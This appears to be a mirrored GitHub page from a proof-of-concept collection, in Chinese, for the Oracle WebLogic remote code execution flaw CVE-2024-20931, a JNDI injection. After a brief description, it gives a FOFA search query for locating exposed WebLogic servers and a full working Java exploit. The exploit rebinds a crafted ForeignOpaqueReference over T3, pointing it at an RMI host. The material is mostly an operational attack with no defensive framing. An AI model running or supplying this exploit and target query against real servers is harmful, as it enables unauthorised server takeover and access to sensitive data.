admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Weblogic/Weblogic远程代码执行(CVE-2024-20931).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

72 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Weblogic远程代码执行(CVE-2024-20931)
Oracle WebLogic Server是一个用于构建、部署和管理企业级Java应用程序。AQjmsInitialContextFactory 是一个允许应用程序使用JNDI查找方式访问Oracle AQ提供消息服务的工厂类。
ForeignOpaqueReference是一个对象lookup时会调用getReferent函数进行远程对象查询。
该漏洞是 CVE-2023-21839 漏洞绕过在AQjmsInitialContextFactory初始化时会通过 JNDI获取远程的 DataSource当通过反射修改 ForeignOpaqueReference 的 jndiEnvironment 和 remoteJNDIName 属性后再次远程查询ForeignOpaqueReference对象会导致 JNDI 注入,从而直接接管 Oracle WebLogic Server 来执行未经授权的操作或访问系统敏感信息。
## fofa
```
(body="Welcome to WebLogic Server") || (title=="Error 404--Not Found") || (((body="
BEA WebLogic Server" || server="Weblogic" || body="content=\"WebLogic Server" || body="
Welcome to Weblogic Application" || body="
BEA WebLogic Server") && header!="couchdb" && header!="boa" && header!="RouterOS" && header!="X-Generator: Drupal") || (banner="Weblogic" && banner!="couchdb" && banner!="drupal" && banner!=" Apache,Tomcat,Jboss" && banner!="ReeCam IP Camera" && banner!="
Blog Comments
")) || (port="7001" && protocol=="weblogic")
```
## poc
```
package com.supeream;
import weblogic.deployment.jms.ForeignOpaqueReference;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.Field;
import java.util.Hashtable;
public class CVE_2024_209321 {
public static void main(String[] args) throws Exception {
String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
// 创建用来远程绑定对象的InitialContext
String url = "t3://127.0.0.1:7001"; // 目标机器
Hashtable env1 = new Hashtable();
env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
env1.put(Context.PROVIDER_URL, url); // 目标
InitialContext c = new InitialContext(env1);
// ForeignOpaqueReference的jndiEnvironment属性
Hashtable env2 = new Hashtable();
env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj");
// ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性
ForeignOpaqueReference f = new ForeignOpaqueReference();
Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
jndiEnvironment.setAccessible(true);
jndiEnvironment.set(f, env2);
Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
remoteJNDIName.setAccessible(true);
String ldap = "rmi://127.0.0.1:1099/ygevmj";
remoteJNDIName.set(f, ldap);
// 远程绑定ForeignOpaqueReference对象
c.rebind("glassy", f);
// lookup查询ForeignOpaqueReference对象
try {
c.lookup("glassy");
} catch (Exception e) {
}
}
}
```
## 漏洞来源
- https://github.com/GlassyAmadeus/CVE-2024-20931
- https://glassyamadeus.github.io/2024/01/31/CVE_2024_20931/
- https://forum.butian.net/share/2780
Reference in New Issue View Git Blame Copy Permalink